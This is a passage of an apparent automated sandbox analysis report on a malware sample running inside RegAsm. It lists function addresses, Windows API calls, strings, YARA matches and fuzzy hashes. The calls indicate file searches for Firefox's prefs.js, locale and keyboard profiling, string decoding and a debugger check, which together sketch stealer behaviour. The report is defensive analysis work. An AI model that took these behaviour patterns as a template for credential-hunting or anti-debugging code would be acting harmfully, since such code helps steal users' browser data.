                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                    • String ID: prefs.js
                                                    • API String ID: 3334442632-3783873740
                                                    • Opcode ID: e5af86cf9f567a319ea98ade86916d1c05143e646acb64ee6597f74a6a6f4ab9
                                                    • Instruction ID: 7ec953875c6c5f14a54d31713d1439a29a4ceec0943a64869dcacad40cfb8c24
                                                    • Opcode Fuzzy Hash: e5af86cf9f567a319ea98ade86916d1c05143e646acb64ee6597f74a6a6f4ab9
                                                    • Instruction Fuzzy Hash: 15B184319001189BCF24FBB1DC56EEE7378AB51304F5041AAE51AE61E1EE399B84CF98
                                                    Function 1FAD5940 Relevance: 12.4, APIs: 8, Instructions: 391COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8b23fef55ace73a1b622bf770b9bff33798a4cf0250868ffdb8cbc39fc84d7a
                                                    • Instruction ID: d49c94b0cf0cf5a00eaafde21fad9eeffc61931d1d73ede0455de95f72f02847
                                                    • Opcode Fuzzy Hash: f8b23fef55ace73a1b622bf770b9bff33798a4cf0250868ffdb8cbc39fc84d7a
                                                    • Instruction Fuzzy Hash: 32C13476E183414FE7009A28DC81BDB77D1AFD2310F98066EF4D58B292F22DB655CB92
                                                    Function 0040C039 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 388fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00425200), ref: 0040C087
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 0040C0D7
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 0040C0ED
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C66C
                                                    • FindClose.KERNEL32(000000FF), ref: 0040C67D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                    • String ID: \*.*
                                                    • API String ID: 2325840235-1173974218
                                                    • Opcode ID: 6623af015f500d8acde99b4a15eaf6d4b8a6deb7eac05948cd420457e942a1a4
                                                    • Instruction ID: 7329d939aed49b63b254d5c25295f9d150e90fd7ec20195b4029a03e332fc4c6
                                                    • Opcode Fuzzy Hash: 6623af015f500d8acde99b4a15eaf6d4b8a6deb7eac05948cd420457e942a1a4
                                                    • Instruction Fuzzy Hash: FAF1EC718101189ADB15FB61DCA5EEE7338BF14305F5041EBE21AA21E1EE396BC9CE94
                                                    Function 1FAC51D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • , xrefs: 1FAC5334
                                                    • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1FAC5264
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                    • API String ID: 0-69911113
                                                    • Opcode ID: 811898fcfffb05ca1521be3bee2424b7d1b7a3293549edf6392e19906e75fabf
                                                    • Instruction ID: 4dee0d1a7aab0aed70cd1450555d930d920c0248312252d5c5929a79810841e3
                                                    • Opcode Fuzzy Hash: 811898fcfffb05ca1521be3bee2424b7d1b7a3293549edf6392e19906e75fabf
                                                    • Instruction Fuzzy Hash: 17418A75A04302AFD700DF29DD80B5AB7E9FF88314F450568F988AB211E77AF951CB92
                                                    Function 1FAFD610 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                                    • Instruction ID: 77b2e9557dff5a9e3e6aae199013ad3de14c26cc9a759ac57f7e78314474a1a1
                                                    • Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                                    • Instruction Fuzzy Hash: 6A4192796007429BD7019F29CD80A5BB7F8FF45311F404A28F9688A210E77DF915CBA2
                                                    Function 00411D31 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00425200), ref: 00411D59
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00411D71
                                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00411D83
                                                    • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00411DD3
                                                    • LocalFree.KERNEL32(00000000), ref: 00411E90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                    • String ID: /
                                                    • API String ID: 3090951853-4001269591
                                                    • Opcode ID: 15a7ab0f5f0475079f1a4d254d2fab6afe80d822c98d4419e6fd3bbb7ed8be85
                                                    • Instruction ID: c70b1ae06e32fba280522d5ae6b93e050f7c05b062ce08c862d254046d427c6b
                                                    • Opcode Fuzzy Hash: 15a7ab0f5f0475079f1a4d254d2fab6afe80d822c98d4419e6fd3bbb7ed8be85
                                                    • Instruction Fuzzy Hash: 8C410E7594021CEBDB20EB90DC89BEDB3B8EB14305F2041DAE61AA61A1DB785FC5CF54
                                                    Function 0040AB80 Relevance: 10.6, APIs: 7, Instructions: 83stringencryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 0040ABB0
                                                    • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,?,?,0040AF23,00000000), ref: 0040ABCC
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,?,0040AF23,00000000), ref: 0040ABD6
                                                    • memcpy.MSVCRT ref: 0040AC63
                                                    • lstrcatA.KERNEL32(?,00425200), ref: 0040AC92
                                                    • lstrcatA.KERNEL32(?,00425200), ref: 0040ACA5
                                                    • lstrcatA.KERNEL32(?,00425200), ref: 0040ACC2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                    • String ID:
                                                    • API String ID: 1498829745-0
                                                    • Opcode ID: 6661e80ca1e7fea63f730de125ff339424fd23340f7e1c57ef70010a67d0dde0
                                                    • Instruction ID: 47d287c87cce67f53112deac9452e79f71b571652ddf1af6d4c21f1cd54e0c8b
                                                    • Opcode Fuzzy Hash: 6661e80ca1e7fea63f730de125ff339424fd23340f7e1c57ef70010a67d0dde0
                                                    • Instruction Fuzzy Hash: F3314671D0421AEFEB109F90DD89BFEBBB9BB04341F6000B6E505B62D0D7745A948F96
                                                    Function 0042224F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00422C26
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00422C3B
                                                    • UnhandledExceptionFilter.KERNEL32(0042C0CC), ref: 00422C46
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00422C62
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422C69
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID: -HB
                                                    • API String ID: 2579439406-1873209616
                                                    • Opcode ID: 3a26e04cc18f38d93f6d02ad207be3ea59d1494876b4088a994347c29471d8c0
                                                    • Instruction ID: f3fe8569a9c03112045512f37a39921c14f1f4f2f23132fc7f3968e34be72834
                                                    • Opcode Fuzzy Hash: 3a26e04cc18f38d93f6d02ad207be3ea59d1494876b4088a994347c29471d8c0
                                                    • Instruction Fuzzy Hash: A721F6B8611602DFD311DF64FDA56563BB2BB0A310FE0612AF60883270E7F55682CF59
                                                    Function 1FA35C70 Relevance: 9.1, APIs: 6, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                    • Instruction ID: 282e7d1bf69f3ff7e894542d0b07ad702e1e83a746ba7e123ce7fc8e7d6ce0b5
                                                    • Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                    • Instruction Fuzzy Hash: 6E4102B6B043029FDB14DF18C884AA6B7F4FF88316F104569E9818B691E76EF854CB60
                                                    Function 1FAB9090 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7661bdd3e6b7b0ae37f5ff041bae1833c0d643ffc32afbc74a03802bbd1b752a
                                                    • Instruction ID: f99387553132f9f97f59ec1e31da77b4a4460dcd134a672cb74446dec1aa075e
                                                    • Opcode Fuzzy Hash: 7661bdd3e6b7b0ae37f5ff041bae1833c0d643ffc32afbc74a03802bbd1b752a
                                                    • Instruction Fuzzy Hash: F531CF397002009FD350CF28E9C4A66B3E8EF88325B4445ADE9428F262E72AFC51DB50
                                                    Function 1FAA1FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1FAA2001
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                    • API String ID: 0-914542581
                                                    • Opcode ID: d6f2eec27353a0a727dda2c2182153353623e61615af1ae3c7242b945dc9f4de
                                                    • Instruction ID: 022425340ee1333b6dd8a2ec47e8f3a93f2606a563eef4a687a4c8e5ad5e08cf
                                                    • Opcode Fuzzy Hash: d6f2eec27353a0a727dda2c2182153353623e61615af1ae3c7242b945dc9f4de
                                                    • Instruction Fuzzy Hash: EE21BB79600315AFDB11AB68ED80F56B7EEEF44314F004458F94497111E36BF874CBA1
                                                    Function 1FC13300 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,1FC13688,?,00000000), ref: 1FC13399
                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,1FC13688,?,00000000), ref: 1FC133C2
                                                    • GetACP.KERNEL32(?,?,1FC13688,?,00000000), ref: 1FC133D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    • Opcode ID: 5511586d90d8fe012ecb3eca295cd8d88011c0645e8c68e32a4ee2aaf7f2b013
                                                    • Instruction ID: 180f98299ccf9c276a6223f3220067a0ed9f9a23244a11bb142b5e9202c36e8a
                                                    • Opcode Fuzzy Hash: 5511586d90d8fe012ecb3eca295cd8d88011c0645e8c68e32a4ee2aaf7f2b013
                                                    • Instruction Fuzzy Hash: 4F215133708202E7D7158F66C905A8A72A6AFC0E68BC64554E90DDF204EF32E962F358
                                                    Function 1FA23AA3 Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserDefaultLCID.KERNEL32 ref: 1FC1365A
                                                    • IsValidCodePage.KERNEL32(00000000), ref: 1FC13698
